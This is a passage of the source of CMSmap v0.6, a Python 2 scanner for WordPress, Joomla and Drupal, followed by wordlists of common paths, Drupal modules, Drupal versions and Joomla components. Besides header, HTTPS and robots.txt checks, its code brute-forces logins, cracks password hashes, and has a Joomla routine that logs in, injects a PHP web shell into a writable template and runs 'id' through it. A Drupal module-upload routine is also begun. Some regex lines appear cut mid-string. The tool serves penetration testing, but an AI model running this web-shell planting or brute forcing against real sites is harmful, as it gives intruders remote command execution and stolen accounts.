= cookielib.CookieJar() 1490 | cookieHandler = urllib2.HTTPCookieProcessor(cookieJar) 1491 | opener = urllib2.build_opener(cookieHandler,multipartpost.MultipartPostHandler) 1492 | opener.addheaders = [('User-agent',agent)] 1493 | cookieJar.clear() 1494 | try: 1495 | # HTTP POST Request 1496 | msg = "[-] Logging into the target website ..."; report.verbose(msg) 1497 | 1498 | # Get Token and Session Cookie 1499 | htmltext = opener.open(self.url+self.joologin).read() 1500 | reg = re.compile(''),htmltext) 1553 | 1554 | msg = "Looking for a writable themplate on the target website ..."; report.verbose(msg) 1555 | for tempPage in tempPages: 1556 | # For each template ID 1557 | htmltext = opener.open(self.url+"/administrator/index.php?option=com_templates&task=source.edit&id="+base64.b64encode(tempPage+":index.php")).read() 1558 | template = re.findall(re.compile('template "(.+?)"\.'),htmltext) 1559 | if verbose : msg = "Joomla template Found: "+ template[0]; report.verbose(msg) 1560 | # Gets phpCode and Token 1561 | self.phpCode = re.findall('(.+?)',htmltext,re.S) 1562 | self.token = re.findall(re.compile("logout&(.+?)=1\">Logout"),htmltext) 1563 | # Decode phpCode and add a shell 1564 | self.newcontent = self.shell+self.phpCode[0].decode('utf8').replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", "'") 1565 | query_args = {"jform[source]": self.newcontent,"task": "source.apply",self.token[0]:"1","jform[extension_id]":tempPage,"jform[filename]":"index.php"} 1566 | data = urllib.urlencode(query_args) 1567 | # Send request 1568 | msg = "Updating a new template with a PHP shell on the target website ..."; report.verbose(msg) 1569 | htmltext = opener.open(self.url+"/administrator/index.php?option=com_templates&layout=edit",data).read() 1570 | 1571 | if not re.search('Error',htmltext,re.IGNORECASE): 1572 | # If not error, then find shell 1573 | htmltext = urllib.urlopen(self.url+"/templates/"+template[0]+"/"+"index.php?c=id").read() 1574 | if re.search('uid=\d+\(.+?\) gid=\d+\(.+?\) groups=\d+\(.+?\)', htmltext) : 1575 | # Front end template 1576 | msg = "Web shell Found: " + self.url+"/templates/"+template[0]+"/"+"index.php?c=id"; report.high(msg) 1577 | msg = "$ id"; report.high(msg) 1578 | msg = htmltext; report.high(msg) 1579 | # shell found then exit 1580 | sys.exit() 1581 | else: 1582 | htmltext = urllib.urlopen(self.url+"/administrator/templates/"+template[0]+"/"+"index.php?c=id").read() 1583 | # Back end template 1584 | if re.search('uid=\d+\(.+?\) gid=\d+\(.+?\) groups=\d+\(.+?\)', htmltext) : 1585 | msg = "Web shell Found: " + self.url+"/administrator/templates/"+template[0]+"/"+"index.php?c=id"; report.high(msg) 1586 | msg = "$ id"; report.high(msg) 1587 | msg = htmltext; report.high(msg) 1588 | # shell found then exit 1589 | sys.exit() 1590 | else: 1591 | msg = "Not Writable Joomla template: "+ template[0]; report.verbose(msg) 1592 | 1593 | except urllib2.HTTPError, e: 1594 | # print e.code 1595 | pass 1596 | 1597 | def DruShell(self,user,password): 1598 | self.drulogin = "/?q=user/login" 1599 | self.drupModules = "/?q=admin/modules" 1600 | self.druAuthorize = "/authorize.php?batch=1&op=do" 1601 | self.druInstall = "/?q=admin/modules/install" 1602 | # Set cookies 1603 | cookieJar = cookielib.CookieJar() 1604 | cookieHandler = urllib2.HTTPCookieProcessor(cookieJar) 1605 | opener = urllib2.build_opener(cookieHandler,multipartpost.MultipartPostHandler) 1606 | opener.addheaders = [('User-agent',agent)] 1607 | cookieJar.clear() 1608 | try: 1609 | # HTTP POST Request 1610 | msg = "Logging into the target website..."; report.verbose(msg) 1611 | 1612 | # Logging into the website with username and password 1613 | self.query_args_login = {"name": user ,"pass": password, "form_id":"user_login"} 1614 | data = urllib.urlencode(self.query_args_login) 1615 | htmltext = opener.open(self.url+self.drulogin, data).read() 1616 | # Get Token and Build id in Upload Page 1617 | htmltext = opener.open(self.url+self.druInstall).read() 1618 | self.token = re.findall(re.compile('Index of", htmltext,re.IGNORECASE) 1681 | if dirList: 1682 | msg = self.url+self.relPath ; report.low(msg) 1683 | except urllib2.HTTPError, e: 1684 | pass 1685 | 1686 | def HTTPSCheck(self): 1687 | pUrl = urlparse.urlparse(self.url) 1688 | scheme = pUrl.scheme.lower() 1689 | if scheme == 'http' : 1690 | # check HTTPS redirection 1691 | req = urllib2.Request(self.url,None, self.headers) 1692 | noRedirOpener = urllib2.build_opener(NoRedirects()) 1693 | try: 1694 | htmltext = noRedirOpener.open(req).read() 1695 | msg = "Website Not in HTTPS: "+self.url 1696 | report.medium(msg) 1697 | except urllib2.HTTPError, e: 1698 | redirected = re.search("https", str(e.info()),re.IGNORECASE) 1699 | if e.code != 302 and not redirected: 1700 | msg = "Website Not in HTTPS: "+self.url 1701 | report.medium(msg) 1702 | 1703 | 1704 | def HeadersCheck(self): 1705 | req = urllib2.Request(self.url,None,self.headers) 1706 | msg = "Checking Headers ..."; report.verbose(msg) 1707 | try: 1708 | response = urllib2.urlopen(req) 1709 | if response.info().getheader('Server'): 1710 | msg = "Server: "+response.info().getheader('Server'); report.info(msg) 1711 | if response.info().getheader('X-Powered-By'): 1712 | msg = "X-Powered-By: "+response.info().getheader('X-Powered-By'); report.info(msg) 1713 | if response.info().getheader('X-Generator'): 1714 | msg = "X-Generator: "+response.info().getheader('X-Generator'); report.low(msg) 1715 | if response.info().getheader('x-xss-protection') == '0': 1716 | msg = "X-XSS-Protection Disabled"; report.high(msg) 1717 | if not response.info().getheader('x-frame-options') or (response.info().getheader('x-frame-options').lower() != 'sameorigin' or 'deny'): 1718 | msg = "X-Frame-Options: Not Enforced"; report.low(msg) 1719 | if not response.info().getheader('strict-transport-security'): 1720 | msg = "Strict-Transport-Security: Not Enforced"; report.info(msg) 1721 | if not response.info().getheader('x-content-security-policy'): 1722 | msg = "X-Content-Security-Policy: Not Enforced"; report.info(msg) 1723 | if not response.info().getheader('x-content-type-options'): 1724 | msg = "X-Content-Type-Options: Not Enforced"; report.info(msg) 1725 | except urllib2.HTTPError, e: 1726 | #print e.code 1727 | pass 1728 | 1729 | def AutocompleteOff(self,relPath): 1730 | self.relPath = relPath 1731 | try: 1732 | req = urllib2.Request(self.url+self.relPath,None,self.headers) 1733 | htmltext = urllib2.urlopen(req).read() 1734 | autoComp = re.search("autocomplete=\"off\"", htmltext,re.IGNORECASE) 1735 | if not autoComp : 1736 | msg = "Autocomplete Off Not Found: "+self.url+self.relPath 1737 | report.info(msg) 1738 | except urllib2.HTTPError, e: 1739 | pass 1740 | 1741 | def RobotsTXT(self): 1742 | req = urllib2.Request(self.url+"/robots.txt",None,self.headers) 1743 | try: 1744 | htmltext = urllib2.urlopen(req).read() 1745 | if len(htmltext) not in self.notValidLen: 1746 | msg = "Robots.txt Found: " +self.url+"/robots.txt"; report.low(msg) 1747 | except urllib2.HTTPError, e: 1748 | msg = "No Robots.txt Found"; report.low(msg) 1749 | pass 1750 | 1751 | def NotExisitingLength(self): 1752 | for exten in self.commExt: 1753 | req = urllib2.Request(self.url+"/N0WayThatYouAreHere"+time.strftime('%d%m%H%M%S')+exten,None, self.headers) 1754 | noRedirOpener = urllib2.build_opener(NoRedirects()) 1755 | try: 1756 | htmltext = noRedirOpener.open(req).read() 1757 | self.notValidLen.append(len(htmltext)) 1758 | except urllib2.HTTPError, e: 1759 | self.notValidLen.append(len(e.read())) 1760 | self.notExistingCode = e.code 1761 | for exten in self.commExt: 1762 | req = urllib2.Request(self.url+"/N0WayThatYouAreHere"+time.strftime('%d%m%H%M%S')+exten,None, self.headers) 1763 | try: 1764 | htmltext = urllib2.urlopen(req).read() 1765 | self.notValidLen.append(len(htmltext)) 1766 | except urllib2.HTTPError, e: 1767 | #print e.code 1768 | self.notValidLen.append(len(e.read())) 1769 | self.notExistingCode = e.code 1770 | self.notValidLen = sorted(set(self.notValidLen)) 1771 | 1772 | def CommonFiles(self): 1773 | msg = "Interesting Directories/Files ... " 1774 | report.message(msg) 1775 | self.interFiles = [] 1776 | # Create Code 1777 | q = Queue.Queue(self.queue_num) 1778 | # Spawn all threads into code 1779 | for u in range(self.thread_num): 1780 | t = ThreadScanner(self.url,"/","",self.interFiles,self.notExistingCode,self.notValidLen,q) 1781 | t.daemon = True 1782 | t.start() 1783 | 1784 | for extIndex,ext in enumerate(self.commExt): 1785 | # Add all plugins to the queue 1786 | for commFilesIndex,file in enumerate(self.commFiles): 1787 | q.put(file+ext) 1788 | sys.stdout.write("\r"+str((100*((len(self.commFiles)*extIndex)+commFilesIndex)/(len(self.commFiles)*len(self.commExt))))+"% "+file+ext+" ") 1789 | sys.stdout.flush() 1790 | q.join() 1791 | sys.stdout.write("\r") 1792 | sys.stdout.flush() 1793 | 1794 | for file in self.interFiles: 1795 | msg = self.url+"/"+file; report.low(msg) 1796 | 1797 | class Report: 1798 | def __init__(self): 1799 | self.fn = "" 1800 | self.log = ' '.join(sys.argv) 1801 | self.col() 1802 | 1803 | 1804 | def col(self): 1805 | if sys.stdout.isatty() and platform.system() != "Windows": 1806 | self.green = '\033[32m' 1807 | self.blue = '\033[94m' 1808 | self.red = '\033[31m' 1809 | self.brown = '\033[33m' 1810 | self.grey = '\033[90m' 1811 | self.orange = '\033[38;5;208m' 1812 | self.yellow = '\033[93m' 1813 | self.end = '\033[0m' 1814 | 1815 | else:# Disalbing col for windows and pipes 1816 | self.green = "" 1817 | self.orange = "" 1818 | self.blue = "" 1819 | self.red = "" 1820 | self.brown = "" 1821 | self.grey = "" 1822 | self.yellow = "" 1823 | self.end = "" 1824 | 1825 | def info(self,msg): 1826 | self.WriteTextFile("[I] " +msg) 1827 | msg = self.green + "[I] " + self.end + msg; print msg 1828 | 1829 | def low(self,msg): 1830 | self.WriteTextFile("[L] " +msg) 1831 | msg = self.yellow + "[L] " + self.end + msg; print msg 1832 | 1833 | def medium(self,msg): 1834 | self.WriteTextFile("[M] " +msg) 1835 | msg = self.orange + "[M] " + self.end + msg; print msg 1836 | 1837 | def high(self,msg): 1838 | self.WriteTextFile("[H] " +msg) 1839 | msg = self.red + "[H] " + self.end + msg; print msg 1840 | 1841 | def status(self,msg): 1842 | self.WriteTextFile("[-] " +msg) 1843 | msg = self.blue + "[-] " + self.end + msg; print msg 1844 | 1845 | def message(self,msg): 1846 | msg = "[-] " + msg; print msg 1847 | self.WriteTextFile(msg) 1848 | 1849 | def error(self,msg): 1850 | self.WriteTextFile("[ERROR] " +msg) 1851 | msg = self.red + "[ERROR] " + self.end + msg; print msg 1852 | 1853 | def verbose(self,msg): 1854 | if verbose: 1855 | self.WriteTextFile("[v] " +msg) 1856 | msg = self.grey + "[v] " + self.end + msg; print msg 1857 | 1858 | def WriteTextFile(self,msg): 1859 | if output: 1860 | self.log += "\n"+msg 1861 | f = open(self.fn,"w") 1862 | f.write(self.log) 1863 | f.close() 1864 | 1865 | def WriteHTMLFile(self): 1866 | pass 1867 | 1868 | # Global Variables ============================================================================================= 1869 | version=0.6 1870 | agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7' 1871 | verbose = False 1872 | CMSmapUpdate = False 1873 | BruteForcingAttack = False 1874 | CrackingPasswords = False 1875 | FullScan = False 1876 | NoExploitdb = False 1877 | dataPath = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data') 1878 | output = False 1879 | threads = 5 1880 | wordlist = 'wordlist/rockyou.txt' 1881 | 1882 | # Global Methods ================================================================================================= 1883 | def exit(signum, frame): 1884 | signal.signal(signal.SIGINT, original_sigint) 1885 | try: 1886 | msg = "Interrupt caught. CMSmap paused. Do you really want to exit?"; report.error(msg) 1887 | if raw_input("[y/N]: ").lower().startswith('y'): 1888 | msg = "Bye! Quitting.. "; report.message(msg) 1889 | sys.exit() 1890 | except KeyboardInterrupt: 1891 | msg = "Bye! Quitting.."; report.message(msg) 1892 | sys.exit() 1893 | signal.signal(signal.SIGINT, exit) 1894 | 1895 | def usage(version): 1896 | print "CMSmap tool v"+str(version)+" - Simple CMS Scanner\nAuthor: Mike Manzotti mike.manzotti@dionach.com\nUsage: " + os.path.basename(sys.argv[0]) + """ -t 1897 | Targets: 1898 | -t, --target target URL (e.g. 'https://example.com:8080/') 1899 | -f, --force force scan (W)ordpress, (J)oomla or (D)rupal 1900 | -F, --fullscan full scan using large plugin lists. False positives and slow! 1901 | -a, --agent set custom user-agent 1902 | -T, --threads number of threads (Default: 5) 1903 | -i, --input scan multiple targets listed in a given text file 1904 | -o, --output save output in a file 1905 | --noedb enumerate plugins without searching exploits 1906 | 1907 | Brute-Force: 1908 | -u, --usr username or file 1909 | -p, --psw password or file 1910 | --noxmlrpc brute forcing WordPress without XML-RPC 1911 | 1912 | Post Exploitation: 1913 | -k, --crack password hashes file (Require hashcat installed. For WordPress and Joomla only) 1914 | -w, --wordlist wordlist file 1915 | 1916 | Others: 1917 | -v, --verbose verbose mode (Default: false) 1918 | -U, --update (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll 1919 | -h, --help show this help 1920 | 1921 | Examples:""" 1922 | print " "+ os.path.basename(sys.argv[0]) +" -t https://example.com" 1923 | print " "+ os.path.basename(sys.argv[0]) +" -t https://example.com -f W -F --noedb" 1924 | print " "+ os.path.basename(sys.argv[0]) +" -t https://example.com -i targets.txt -o output.txt" 1925 | print " "+ os.path.basename(sys.argv[0]) +" -t https://example.com -u admin -p passwords.txt" 1926 | print " "+ os.path.basename(sys.argv[0]) +" -k hashes.txt -w passwords.txt" 1927 | 1928 | if __name__ == "__main__": 1929 | # command line arguments 1930 | 1931 | scanner = Scanner() 1932 | report = Report() 1933 | initializer = Initialize() 1934 | bruter = BruteForcer() 1935 | searcher = ExploitDBSearch() 1936 | 1937 | if sys.argv[1:]: 1938 | try: 1939 | optlist, args = getopt.getopt(sys.argv[1:], 't:u:p:T:o:k:w:vhU:f:i:Fa:', ["target=", "verbose","version","help","usr=","psw=","output=","threads=","crack=","wordlist=","force=","update=","input=","fullscan","agent=","noxmlrpc","noedb"]) 1940 | except getopt.GetoptError as err: 1941 | # print help information and exit: 1942 | print(err) # print something like "option -a not recognized" 1943 | usage(version) 1944 | sys.exit(2) 1945 | for o, a in optlist: 1946 | if o in ("-h", "--help", "--version"): 1947 | usage(version) 1948 | sys.exit() 1949 | elif o in ("-t", "--target"): 1950 | if a.endswith("/") : 1951 | a = a[:-1] 1952 | scanner.url = bruter.url = searcher.url = a 1953 | scanner.CheckURL() 1954 | scanner.NotExisitingCode() 1955 | elif o in ("-u", "--usr"): 1956 | bruter.usrlist = a 1957 | BruteForcingAttack = True 1958 | elif o in ("-p", "--psw"): 1959 | bruter.pswlist = a 1960 | elif o in ("-k", "--crack"): 1961 | CrackingPasswords = True 1962 | hashfile = a 1963 | elif o in ("-f", "--force"): 1964 | scanner.force = a 1965 | elif o in ("-w", "--wordlist"): 1966 | wordlist = a 1967 | elif o in ("-T", "--threads"): 1968 | threads = int(a) 1969 | msg = "Threads Set : "+str(threads); report.info(msg) 1970 | elif o in("-o", "--output"): 1971 | output = True 1972 | report.fn = a 1973 | elif o in("-i", "--input"): 1974 | scanner.file = a 1975 | elif o in("-U", "--update"): 1976 | CMSmapUpdate = True 1977 | initializer.forceUpdate = a 1978 | elif o in("-F", "--fullscan"): 1979 | FullScan = True 1980 | elif o in("-a", "--agent"): 1981 | agent = scanner.agent = initializer.agent = a 1982 | elif o in("--noxmlrpc"): 1983 | bruter.wpnoxmlrpc = False 1984 | elif o in ("--noedb"): 1985 | NoExploitdb = True 1986 | elif o in("-v", "--verbose"): 1987 | verbose = True 1988 | else: 1989 | usage(version) 1990 | sys.exit() 1991 | else: 1992 | usage(version) 1993 | sys.exit() 1994 | 1995 | start = time.time() 1996 | msg = "Date & Time: "+ time.strftime('%d/%m/%Y %H:%M:%S') 1997 | report.status(msg) 1998 | 1999 | original_sigint = signal.getsignal(signal.SIGINT) 2000 | signal.signal(signal.SIGINT, exit) 2001 | 2002 | if CMSmapUpdate : 2003 | initializer.UpdateRun() 2004 | 2005 | elif BruteForcingAttack : 2006 | if scanner.force is not None: 2007 | bruter.force = scanner.force 2008 | bruter.Start() 2009 | else: 2010 | scanner.FindCMSType() 2011 | bruter.force = scanner.force 2012 | bruter.Start() 2013 | elif CrackingPasswords: 2014 | PostExploit(None).CrackingHashesType(hashfile, wordlist) 2015 | 2016 | elif scanner.file is not None: 2017 | targets = [line.strip() for line in open(scanner.file)] 2018 | for url in targets: 2019 | scanner.url = url 2020 | msg = "Target: "+scanner.url; report.status(msg) 2021 | scanner.threads = threads 2022 | scanner.FindCMSType() 2023 | scanner.ForceCMSType() 2024 | 2025 | elif scanner.force is not None: 2026 | msg = "Target: "+scanner.url; report.status(msg) 2027 | scanner.threads = threads 2028 | scanner.ForceCMSType() 2029 | else : 2030 | msg = "Target: "+scanner.url; report.status(msg) 2031 | scanner.threads = threads 2032 | scanner.FindCMSType() 2033 | scanner.ForceCMSType() 2034 | 2035 | end = time.time() 2036 | diffTime = end - start 2037 | msg = "Date & Time: "+time.strftime('%d/%m/%Y %H:%M:%S') 2038 | report.status(msg) 2039 | msg = "Completed in: "+str(datetime.timedelta(seconds=diffTime)).split(".")[0] 2040 | report.status(msg) 2041 | if output: msg = "Output File Saved in: "+report.fn; report.status(msg) 2042 | 2043 | 2044 | -------------------------------------------------------------------------------- /data/common_files.txt: -------------------------------------------------------------------------------- 1 | .bash_profile 2 | .bashrc 3 | .db_config 4 | .default 5 | .logs 6 | .old 7 | .private 8 | .queries 9 | .query 10 | .secret 11 | .sql 12 | .temp 13 | .temp2 14 | 0 15 | 1 16 | 2 17 | 2010 18 | 2011 19 | 2012 20 | 2013 21 | 2014 22 | 2015 23 | 2016 24 | 2017 25 | 2018 26 | 2019 27 | 2020 28 | 3 29 | 4 30 | 5 31 | 6 32 | 7 33 | 8 34 | 9 35 | Documents 36 | Downloads 37 | files 38 | file 39 | Info 40 | Install 41 | PHPINFO 42 | PHPinfo 43 | Scripts 44 | Temp 45 | Test 46 | Tmp 47 | WebServices 48 | _ 49 | __ 50 | __admin 51 | __administrator 52 | __backup 53 | __backups 54 | __temp 55 | _admin 56 | _administrator 57 | _backup 58 | _backups 59 | _baks 60 | _inc 61 | _includes 62 | _index 63 | _index2 64 | _layouts 65 | _notes 66 | _private 67 | _scripts 68 | _temp 69 | _themes 70 | _vti_log 71 | _vti_map 72 | a 73 | account 74 | ad 75 | agents 76 | agreement 77 | album 78 | all 79 | amazon 80 | api 81 | apps 82 | ar 83 | archives 84 | articles 85 | audio 86 | awstats 87 | b 88 | backend 89 | backup 90 | backup2 91 | bak 92 | baks 93 | bash 94 | beta 95 | blocks 96 | blog 97 | board 98 | booking 99 | c 100 | c100 101 | c99 102 | cache 103 | calendar 104 | cards 105 | cc 106 | cgi.bin 107 | cgi_bin 108 | change_password 109 | charts 110 | chat 111 | checkout 112 | checkout-step2 113 | clean 114 | click 115 | clone 116 | cms 117 | com 118 | common 119 | config 120 | config2 121 | confirm 122 | connections 123 | core 124 | corporate 125 | cp 126 | customer 127 | cv 128 | d 129 | dashboard 130 | data 131 | data2 132 | date 133 | day 134 | db 135 | db_config 136 | db_config2 137 | default 138 | default2 139 | demo 140 | demo2 141 | dev 142 | development 143 | directory 144 | doc 145 | docs 146 | documents 147 | download_private 148 | dropbox 149 | drup 150 | wp 151 | joo 152 | drupal 153 | drupal2 154 | e 155 | email 156 | eng 157 | engine 158 | english 159 | error 160 | error2 161 | error403 162 | error_500 163 | error_log 164 | etc 165 | event 166 | export 167 | external 168 | f 169 | favorites 170 | fckeditor 171 | filter 172 | find 173 | flash 174 | forgot 175 | forgot2 176 | form 177 | forms 178 | forum 179 | fpdb 180 | friday 181 | ftp 182 | g 183 | gallery 184 | games 185 | general 186 | go 187 | groups 188 | h 189 | header 190 | footer 191 | help 192 | hi 193 | hidden 194 | hooks 195 | htmlarea 196 | http_error 197 | i 198 | iframes 199 | image 200 | imguploads 201 | index2 202 | index_old 203 | info 204 | insert 205 | install 206 | install2 207 | intranet 208 | iphone 209 | j 210 | jobs 211 | join 212 | joomla 213 | joomla2 214 | jquery 215 | jsp 216 | jwplayer 217 | k 218 | l 219 | l33t 220 | legal 221 | link 222 | list 223 | local 224 | log 225 | logs 226 | m 227 | mail 228 | main 229 | mambots 230 | manage 231 | manager 232 | menu 233 | message 234 | min 235 | module 236 | monday 237 | my_demo 238 | my_playlist 239 | my_video 240 | n 241 | nc 242 | net 243 | newsletters 244 | nobody 245 | nothing 246 | o 247 | objects 248 | old-cms 249 | old-config 250 | old-demo 251 | old-export 252 | old-query 253 | old-settings 254 | old-upload 255 | old-uploads 256 | old-welcome 257 | old_back 258 | old_backup 259 | old_chat 260 | old_cms 261 | old_config 262 | old_data 263 | old_demo 264 | old_documents 265 | old_login 266 | old_myaccount 267 | old_post 268 | old_print 269 | old_query 270 | old_settings 271 | old_sql 272 | old_stuff 273 | old_upload 274 | old_users 275 | olddata 276 | online 277 | other 278 | others 279 | p 280 | page2 281 | paid 282 | panel 283 | partners 284 | password 285 | passwords 286 | pay 287 | payment 288 | paypal 289 | pda 290 | perl 291 | photo 292 | photos 293 | php 294 | php3 295 | php4 296 | php5 297 | phpBB 298 | phpBB2 299 | phpBB3 300 | phpMyAdmin 301 | phpThumb 302 | php_uploads 303 | phpbb 304 | phpinfo 305 | phpmyadmin 306 | phpthumb 307 | ping 308 | piwik 309 | pkginfo 310 | player 311 | pma 312 | portfolio 313 | post 314 | post2 315 | print 316 | priv8 317 | private 318 | promo 319 | pt 320 | pub 321 | pwn 322 | pwn3d 323 | pwned 324 | q 325 | queries 326 | query 327 | r 328 | random 329 | redirect 330 | require 331 | results 332 | root 333 | s 334 | s3cr3t 335 | saturday 336 | schema 337 | se 338 | secret 339 | secure 340 | sendmessage 341 | service 342 | settings 343 | settings2 344 | setup 345 | shell 346 | shell2 347 | showgallery 348 | sign-in 349 | sign-up 350 | sitemap 351 | software 352 | source 353 | hello 354 | sp 355 | spy 356 | sql 357 | sql_queries 358 | src 359 | static 360 | statistics 361 | stats 362 | status 363 | stuff 364 | stuff2 365 | submit 366 | subscribe 367 | subscrption 368 | sunday 369 | survey 370 | swfplayer 371 | system 372 | t 373 | t0 374 | t1 375 | t2 376 | t3 377 | t4 378 | t5 379 | t6 380 | t7 381 | t8 382 | t9 383 | tabs 384 | temp 385 | temp2 386 | template 387 | term 388 | test 389 | test2 390 | test_login 391 | test_upload 392 | text 393 | thursday 394 | tiny_mce 395 | tl 396 | tmp 397 | tmp2 398 | travel 399 | tuesday 400 | txt 401 | typo3temp 402 | u 403 | uat 404 | uk 405 | umbraco 406 | up 407 | updates 408 | upload 409 | upload2 410 | uploads 411 | urllist 412 | user_login 413 | userdetails 414 | users 415 | users2 416 | utils 417 | v 418 | version 419 | w 420 | w00t 421 | wap 422 | web 423 | webapp 424 | webmail 425 | webmaster 426 | wednesday 427 | welcome 428 | welcome2 429 | widget 430 | wiki 431 | wordpress 432 | wordpress2 433 | write 434 | wwwboard 435 | x 436 | y 437 | yesterday 438 | z -------------------------------------------------------------------------------- /data/dru_plugins_small.txt: -------------------------------------------------------------------------------- 1 | acl 2 | addressfield 3 | addthis 4 | addtoany 5 | admin 6 | admin_menu 7 | admin_views 8 | adminrole 9 | advagg 10 | advanced_forum 11 | advanced_help 12 | apachesolr 13 | auto_nodetitle 14 | backup_migrate 15 | backup_migrate_files 16 | better_exposed_filters 17 | better_formats 18 | block_class 19 | block_titlelink 20 | boost 21 | breakpoints 22 | bundle_copy 23 | calendar 24 | captcha 25 | cck 26 | chart 27 | checklistapi 28 | ckeditor 29 | ckeditor_link 30 | colorbox 31 | colorbox_node 32 | commerce 33 | commerce_paypal 34 | commerce_shipping 35 | computed_field 36 | conditional_fields 37 | conditional_styles 38 | contemplate 39 | content_access 40 | content_taxonomy 41 | context 42 | css_injector 43 | ctools 44 | custom_breadcrumbs 45 | custom_search 46 | date 47 | db_maintenance 48 | ddblock 49 | delta 50 | devel 51 | dhtml_menu 52 | diff 53 | disqus 54 | draggableviews 55 | ds 56 | elements 57 | email 58 | email_registration 59 | emfield 60 | entity 61 | entity_translation 62 | entitycache 63 | entityreference 64 | eva 65 | exclude_node_title 66 | extlink 67 | facetapi 68 | faq 69 | fb 70 | fblikebutton 71 | fckeditor 72 | features 73 | features_extra 74 | feeds 75 | feeds_tamper 76 | fences 77 | field_collection 78 | field_formatter_settings 79 | field_group 80 | field_permissions 81 | field_slideshow 82 | file_entity 83 | filefield 84 | filefield_paths 85 | filefield_sources 86 | fivestar 87 | flag 88 | flexslider 89 | follow 90 | fontyourface 91 | front 92 | galleryformatter 93 | geocoder 94 | geofield 95 | geophp 96 | getid3 97 | globalredirect 98 | gmap 99 | google_analytics 100 | hierarchical_select 101 | honeypot 102 | htmlmail 103 | i18n 104 | i18nviews 105 | image 106 | image_resize_filter 107 | image_url_formatter 108 | imageapi 109 | imagecache 110 | imagecache_actions 111 | imagefield 112 | imagefield_crop 113 | imce 114 | imce_mkdir 115 | imce_wysiwyg 116 | inline_entity_form 117 | insert 118 | jcarousel 119 | job_scheduler 120 | jquery_plugin 121 | jquery_ui 122 | jquery_update 123 | l10n_client 124 | l10n_update 125 | languageicons 126 | less 127 | libraries 128 | lightbox2 129 | link 130 | linkchecker 131 | linkit 132 | location 133 | login_destination 134 | logintoboggan 135 | mailchimp 136 | mailsystem 137 | masquerade 138 | maxlength 139 | media 140 | media_gallery 141 | media_vimeo 142 | media_youtube 143 | memcache 144 | menu_attributes 145 | menu_block 146 | menu_breadcrumb 147 | menu_per_role 148 | menu_position 149 | message 150 | message_notify 151 | metatag 152 | metatags_quick 153 | migrate 154 | migrate_extras 155 | mimemail 156 | module_filter 157 | mollom 158 | multiblock 159 | multiform 160 | multiupload_filefield_widget 161 | multiupload_imagefield_widget 162 | nice_menus 163 | nivo_slider 164 | node_clone 165 | node_export 166 | nodeblock 167 | nodequeue 168 | nodereference_url 169 | nodewords 170 | oauth 171 | og 172 | omega_tools 173 | options_element 174 | override_node_options 175 | page_title 176 | panelizer 177 | panels 178 | path_redirect 179 | pathauto 180 | pathologic 181 | phone 182 | plupload 183 | poormanscron 184 | print 185 | privatemsg 186 | profile2 187 | quicktabs 188 | realname 189 | recaptcha 190 | redirect 191 | references 192 | robotstxt 193 | role_delegation 194 | rules 195 | scheduler 196 | search404 197 | search_api 198 | search_api_db 199 | search_api_solr 200 | search_config 201 | securepages 202 | security_review 203 | select_or_other 204 | seo_checklist 205 | service_links 206 | services 207 | shadowbox 208 | sharethis 209 | simple_gmap 210 | simplehtmldom 211 | simplenews 212 | site_map 213 | site_verify 214 | skinr 215 | smtp 216 | socialmedia 217 | spamspan 218 | special_menu_items 219 | stringoverrides 220 | strongarm 221 | superfish 222 | tablefield 223 | tagadelic 224 | taxonomy_manager 225 | taxonomy_menu 226 | themekey 227 | title 228 | token 229 | transliteration 230 | twitter 231 | twitter_pull 232 | ubercart 233 | uuid 234 | variable 235 | vertical_tabs 236 | video 237 | video_embed_field 238 | viewfield 239 | views 240 | views_accordion 241 | views_autocomplete_filters 242 | views_bulk_operations 243 | views_customfield 244 | views_data_export 245 | views_field_view 246 | views_megarow 247 | views_nivo_slider 248 | views_pdf 249 | views_php 250 | views_slideshow 251 | votingapi 252 | webform 253 | webform_conditional 254 | webform_validation 255 | weight 256 | widgets 257 | workbench 258 | workbench_moderation 259 | wysiwyg 260 | wysiwyg_filter 261 | xmlsitemap 262 | youtube 263 | -------------------------------------------------------------------------------- /data/dru_versions.txt: -------------------------------------------------------------------------------- 1 | 7.35 2 | 7.34 3 | 7.33 4 | 7.32 5 | 7.31 6 | 7.30 7 | 7.29 8 | 7.28 9 | 7.27 10 | 7.26 11 | 7.25 12 | 7.24 13 | 7.23 14 | 7.22 15 | 7.21 16 | 7.20 17 | 7.19 18 | 7.18 19 | 7.17 20 | 7.16 21 | 7.15 22 | 7.14 23 | 7.13 24 | 7.12 25 | 7.11 26 | 7.10 27 | 7.9 28 | 7.8 29 | 7.7 30 | 7.6 31 | 7.5 32 | 7.4 33 | 7.3 34 | 7.2 35 | 7.1 36 | 7.0-rc4 37 | 7.0-rc3 38 | 7.0-rc2 39 | 7.0-rc1 40 | 7.0-beta3 41 | 7.0-beta2 42 | 7.0-beta1 43 | 7.0-alpha7 44 | 7.0-alpha6 45 | 7.0-alpha4 46 | 7.0-alpha3 47 | 7.0-alpha1 48 | 7 49 | 6.29 50 | 6.28 51 | 6.27 52 | 6.26 53 | 6.25 54 | 6.24 55 | 6.23 56 | 6.22 57 | 6.21 58 | 6.20 59 | 6.19 60 | 6.18 61 | 6.17 62 | 6.16 63 | 6.15 64 | 6.14 65 | 6.13 66 | 6.12 67 | 6.11 68 | 6.10 69 | 6.9 70 | 6.8 71 | 6.7 72 | 6.6 73 | 6.5 74 | 6.4 75 | 6.3 76 | 6.2 77 | 6.1 78 | 6.0-rc4 79 | 6.0-rc3 80 | 6.0-rc2 81 | 6.0-rc1 82 | 6.0-beta3 83 | 6.0-beta2 84 | 6.0-beta1 85 | 6 86 | 5.23 87 | 5.22 88 | 5.21 89 | 5.20 90 | 5.19 91 | 5.18 92 | 5.17 93 | 5.16 94 | 5.15 95 | 5.14 96 | 5.13 97 | 5.12 98 | 5.11 99 | 5.10 100 | 5.9 101 | 5.8 102 | 5.7 103 | 5.6 104 | 5.5 105 | 5.4 106 | 5.3 107 | 5.2 108 | 5.1 109 | 5 -------------------------------------------------------------------------------- /data/joo_plugins.txt: -------------------------------------------------------------------------------- 1 | com_5starhotels 2 | com_aardvertiser 3 | com_ab_gallery 4 | com_abbrev 5 | com_abc 6 | com_about 7 | com_acajoom 8 | com_acctexp 9 | com_aclassf 10 | com_acmisc 11 | com_acooldebate 12 | com_acprojects 13 | com_acstartseite 14 | com_acteammember 15 | com_actions 16 | 